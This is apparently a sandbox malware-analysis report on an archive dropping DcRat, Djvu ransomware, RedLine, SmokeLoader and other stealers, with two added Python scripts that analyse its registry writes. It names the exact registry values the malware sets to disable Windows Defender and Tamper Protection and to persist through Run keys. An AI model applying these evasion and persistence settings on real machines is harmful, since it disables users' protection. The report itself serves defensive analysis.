Malware Analysis Report

2025-01-18 06:22

Sample ID 231017-hrx2nsbf74
Target Archive.7z
SHA256 c5d36d14ec04f6a568172a2a91959b17dc768c41dc6bc9486d975d41056ac7b0
Tags
dcrat djvu privateloader redline risepro smokeloader stealc breha build285 logsdiller cloud (tg: @logsdillabot) up3 amadey_qbo backdoor collection discovery evasion infostealer loader persistence ransomware rat spyware stealer trojan vmprotect amadey themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c5d36d14ec04f6a568172a2a91959b17dc768c41dc6bc9486d975d41056ac7b0

Threat Level: Known bad

The file Archive.7z was found to be: Known bad.

Malicious Activity Summary

dcrat djvu privateloader redline risepro smokeloader stealc breha build285 logsdiller cloud (tg: @logsdillabot) up3 amadey_qbo backdoor collection discovery evasion infostealer loader persistence ransomware rat spyware stealer trojan vmprotect amadey themida

DcRat

Amadey

Djvu Ransomware

RedLine

Detected Djvu ransomware

RedLine payload

PrivateLoader

Stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

SmokeLoader

Modifies Windows Defender Real-time Protection settings

RisePro

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Renames multiple (169) files with added filename extension

Finds standalone samples of Amadey based on characteristic strings

Stops running service(s)

Downloads MZ/PE file

VMProtect packed file

Loads dropped DLL

Drops startup file

Reads user/profile data of web browsers

Windows security modification

.NET Reactor protector

Executes dropped EXE

Reads user/profile data of local email clients

Themida packer

Checks BIOS information in registry

Modifies file permissions

Checks computer location settings

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Drops Chrome extension

Accesses Microsoft Outlook profiles

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Looks up external IP address via web service

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious behavior: CmdExeWriteProcessMemorySpam

outlook_office_path

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Creates scheduled task(s)

Suspicious behavior: LoadsDriver

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Checks processor information in registry

Suspicious behavior: MapViewOfSection

outlook_win_path

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Uses Task Scheduler COM API

Modifies Internet Explorer settings

Suspicious use of UnmapMainImage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-17 06:59

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-17 06:58

Reported

2023-10-17 07:28

Platform

win7-20230831-en

Max time kernel

887s

Max time network

1060s

Command Line

C:\Windows\Explorer.EXE

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe" C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\6a32e694-ce15-4166-b5d5-39601b8b4741\\_Axw7GGd2Fy7GTHeEDtFtPCq.exe\" --AutoStart" C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe N/A

PrivateLoader

loader privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RisePro

stealer risepro

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

Finds standalone samples of Amadey based on characteristic strings

amadey_qbo
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Stops running service(s)

evasion

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\p0Md4MBiYJc6SgyciNphhNUh.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\ch5c8B5ZdA4rJTdsnDNjoJVN.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\ZW9r6_Jcut69xZ7q3DByCddi.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\8of3DRmQjWCjBhE2NNvN6ur1.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Kh9Eh27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cu2Lz27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xt8uk02.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2lv8023.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3Gh68ms.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4nE240CO.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\J09p8V_CfJYAsxckvyLwXWHH.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5Cy9OS5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Vw8Dv1.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\05i4TLYHZEFYjn7jxbwobpPC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000357001\e0cbefcb1af40c7d4aff4aca26621a98.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Kh9Eh27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Kh9Eh27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cu2Lz27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cu2Lz27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xt8uk02.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xt8uk02.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xt8uk02.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xt8uk02.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2lv8023.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cu2Lz27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cu2Lz27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3Gh68ms.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Kh9Eh27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Kh9Eh27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4nE240CO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5Cy9OS5.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Vw8Dv1.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\J09p8V_CfJYAsxckvyLwXWHH.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1FG56KM1.exe N/A
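Analyst note (added example, not output of the sandbox): the "Modifies Windows Defender Real-time Protection settings" table above and the two rows just here record the same process, 1FG56KM1.exe, disabling real-time protection through the Policies key and writing TamperProtection = 0 under Wow6432Node. The Wow6432Node path is what a 32-bit process gets when it writes HKLM\SOFTWARE on a 64-bit host: WOW64 redirects that hive except for a short list of shared keys, and HKLM\SOFTWARE\Policies is on that list, which is why the five policy writes show no Wow6432Node while the Features write does (the sandbox logs the post-redirection path). The Python below models that redirection and reports which of the writes actually reach the key Defender reads. It is this editor's code; the shared-key list is a subset of Microsoft's documented list and the "requested" native-view paths are reconstructed from the report, both assumptions.

```python
# Added example (not sandbox output): model WOW64 registry redirection for the
# Defender writes made by 1FG56KM1.exe, a 32-bit process on a 64-bit host.
# SHARED_KEYS is a subset of Microsoft's "Registry Keys Affected by WOW64" list
# (assumption: only the entries relevant to this report are included).

HKLM_SOFTWARE = "\\REGISTRY\\MACHINE\\SOFTWARE\\"
WOW_NODE = HKLM_SOFTWARE + "Wow6432Node\\"
SHARED_KEYS = (
    HKLM_SOFTWARE + "Policies",
    HKLM_SOFTWARE + "Microsoft\\Windows\\CurrentVersion\\Policies",
)


def effective_path(requested, writer_is_32bit=True, host_is_64bit=True):
    """Key path a write lands in after WOW64 redirection.

    Only HKLM\\SOFTWARE is redirected for 32-bit writers; HKU, SYSTEM and
    HARDWARE are not, and the keys in SHARED_KEYS stay in the native view.
    """
    if not (writer_is_32bit and host_is_64bit):
        return requested
    if not requested.startswith(HKLM_SOFTWARE) or requested.startswith(WOW_NODE):
        return requested
    if any(requested == k or requested.startswith(k + "\\") for k in SHARED_KEYS):
        return requested
    return WOW_NODE + requested[len(HKLM_SOFTWARE):]


# The requests behind the report's two tables, in the native view Defender reads
# (constructed: the sandbox logs only the post-redirection path).
RTP = HKLM_SOFTWARE + "Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\"
FEATURES = HKLM_SOFTWARE + "Microsoft\\Windows Defender\\Features\\"
SAMPLE_WRITES = [
    (RTP + "DisableOnAccessProtection", 1),
    (RTP + "DisableRealtimeMonitoring", 1),
    (RTP + "DisableScanOnRealtimeEnable", 1),
    (RTP + "DisableBehaviorMonitoring", 1),
    (RTP + "DisableIOAVProtection", 1),
    (FEATURES + "TamperProtection", 0),
]


def audit(writes, writer_is_32bit=True, host_is_64bit=True):
    """Per write: value name, where it landed, and whether Defender's native key was touched."""
    results = []
    for path, data in writes:
        landed = effective_path(path, writer_is_32bit, host_is_64bit)
        results.append({
            "value": path.rpartition("\\")[2],
            "data": data,
            "landed_in": landed,
            "reaches_native_key": landed == path,
        })
    return results


if __name__ == "__main__":
    for r in audit(SAMPLE_WRITES):
        where = "native key" if r["reaches_native_key"] else "Wow6432Node shadow, never read by Defender"
        print(f'{r["value"]} = {r["data"]}: {where}')
```

The five Real-Time Protection policy values land where Defender reads them; the TamperProtection write is shadowed under Wow6432Node and would be rejected even if it were not, because on Windows 10 1903 and later Tamper Protection refuses registry edits to its own switch and to these real-time protection settings. The detonation platform here is Windows 7 (win7-20230831-en), which predates Tamper Protection, so on this host only the policy writes have any effect.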

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe" C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cu2Lz27.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xt8uk02.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\6a32e694-ce15-4166-b5d5-39601b8b4741\\_Axw7GGd2Fy7GTHeEDtFtPCq.exe\" --AutoStart" C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Kh9Eh27.exe N/A
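Analyst note (added example, not from the report): the seven Run/RunOnce rows above are not all persistence. The wextract_cleanupN values under RunOnce are written by wextract, the Windows self-extracting cabinet stub that IExpress produces, to delete its IXP00N.TMP extraction folder at the next logon through advpack.dll's DelNodeRunDLL32. The increasing index, and the fact that each one is written by the executable extracted into the previous IXP folder, expose a five-deep nested dropper chain (IXP000.TMP through IXP004.TMP). The real autoruns are the HKCU Run values ExtreamFanV5 and SysHelper (the latter re-launching _Axw7GGd2Fy7GTHeEDtFtPCq.exe from a GUID-named AppData\Local folder with --AutoStart, the layout STOP/Djvu uses) plus the Startup-folder PowerExpertNT.lnk from the "Drops startup file" table. The Python below is this editor's code, not a sandbox feature: it parses rows in the report's own layout, separates the two cases and reconstructs the chain. The input rows are copied from this report; the classification rules are an assumption.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Indicator rows copied from this report's "Adds Run key to start application"
# and "Drops startup file" tables (constructed sample input in the sandbox's
# "<description> <indicator> <process> <target>" layout).
SAMPLE = [
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe" C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cu2Lz27.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xt8uk02.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\6a32e694-ce15-4166-b5d5-39601b8b4741\\_Axw7GGd2Fy7GTHeEDtFtPCq.exe\" --AutoStart" C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\Pictures\Minor Policy\r0AmxgPgCNAvJP2wBzVyrn8O.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Px7dg92.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Kh9Eh27.exe N/A',
    r'File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk C:\Users\Admin\Pictures\Minor Policy\S3G8zb34YK75eg8vIvwnsVI2.exe N/A',
]

REG_RE = re.compile(r'^Set value \((\w+)\) (\\REGISTRY\\.+?) = "(.*)" (C:\\.+?) N/A$')
FILE_RE = re.compile(r'^File created (C:\\.+?) (C:\\.+?) N/A$')
CLEANUP_RE = re.compile(r'^wextract_cleanup(\d+)$')


@dataclass
class Autorun:
    kind: str        # "autorun", "startup-folder" or "wextract-cleanup"
    scope: str       # "user" (HKU / user profile) or "machine" (HKLM)
    name: str        # value name or .lnk file name
    target: str      # image that will run, or the folder wextract will delete
    args: str        # command-line arguments of the autorun image
    writer: str      # process that created the entry
    stage: int = -1  # wextract nesting depth, cleanup entries only


def unescape(data: str) -> str:
    """Undo the sandbox's C-style escaping of REG_SZ data (\\\\ -> \\, \\" -> ")."""
    return re.sub(r'\\(.)', r'\1', data)


def split_command(cmd: str):
    """Split 'image args' where the image may be double-quoted."""
    m = re.match(r'^"([^"]+)"(.*)$', cmd) or re.match(r'^(\S+)(.*)$', cmd)
    return m.group(1), m.group(2).strip()


def parse_line(line: str) -> Optional[Autorun]:
    m = REG_RE.match(line)
    if m:
        _, path, data, writer = m.groups()
        key, _, name = path.rpartition("\\")
        scope = "user" if path.startswith("\\REGISTRY\\USER\\") else "machine"
        cmd = unescape(data)
        c = CLEANUP_RE.match(name)
        if key.endswith("\\RunOnce") and c and "DelNodeRunDLL32" in cmd:
            # wextract's own one-shot cleanup of its IXP00N.TMP folder, not persistence
            folder = re.search(r'"([^"]+)"', cmd).group(1)
            return Autorun("wextract-cleanup", scope, name, folder, "", writer, int(c.group(1)))
        if key.endswith("\\Run") or key.endswith("\\RunOnce"):
            image, args = split_command(cmd)
            return Autorun("autorun", scope, name, image, args, writer)
        return None
    m = FILE_RE.match(line)
    if m and "\\Start Menu\\Programs\\Startup\\" in m.group(1):
        return Autorun("startup-folder", "user", m.group(1).rpartition("\\")[2], m.group(1), "", m.group(2))
    return None


def triage(lines):
    """Return (real persistence entries, wextract stages ordered by nesting depth)."""
    records = [r for r in map(parse_line, lines) if r]
    persistence = [r for r in records if r.kind != "wextract-cleanup"]
    chain = sorted((r for r in records if r.kind == "wextract-cleanup"), key=lambda r: r.stage)
    return persistence, chain


if __name__ == "__main__":
    persistence, chain = triage(SAMPLE)
    for r in persistence:
        print(f"PERSIST [{r.scope}] {r.kind}: {r.name} -> {r.target} {r.args}".rstrip())
    for r in chain:
        print(f"STAGE {r.stage}: {r.writer.rpartition(chr(92))[2]} extracted {r.target}")
```

Scope matters for containment: the two Run values live in the user's hive (S-1-5-21-…-1000), so they survive only for that account, while the wextract cleanup entries are machine-wide RunOnce values that disappear after one logon. The chain output lists, per stage, which executable unpacked the next folder, which is the order an analyst should pull the IXP00N.TMP payloads in.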

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgmhkjfpialldbnnihoodfehhlmpplgf\1.5.6_0\manifest.json C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
